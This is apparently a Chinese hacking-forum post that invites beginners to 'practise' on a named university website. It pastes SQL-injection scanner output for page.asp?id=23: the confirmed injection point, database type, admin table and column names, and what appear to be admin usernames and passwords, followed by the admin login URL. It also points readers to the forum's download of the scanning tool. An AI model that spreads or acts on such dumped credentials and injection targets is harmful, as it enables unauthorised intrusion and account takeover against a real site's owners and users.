一个asp网站存在注入漏洞 菜鸟全进

郭先生

菜鸟们可以练练手：http://www.abcd.edu.cn/ 用《易我入侵检测》扫描了，大家可以在本论坛下载这个工具，扫描结果如下： [17:28:28]分析的URL:http://www.abcd.edu.cn/page.asp?id=23 [17:28:32]恭喜，该URL可以注入！ [17:28:32]数据库类型：ACCESS数据库 [17:28:34]猜解到表名：admin [17:28:36]已停止猜解表名！ [17:28:41]猜解到列名：admin_name [17:28:41]猜解到列名：admin_user [17:28:43]猜解到列名：id [17:28:47]猜解到列名：admin_pass [17:28:48]已停止猜解列名！ [17:28:51]所有记录共2条 [17:29:01]内容为：admin [17:29:22]内容为：huali127 [17:29:32]内容为：guest [17:29:49]内容为：12***23 后台地址扫描结果： http://www.abcd.edu.cn/admin/login.asp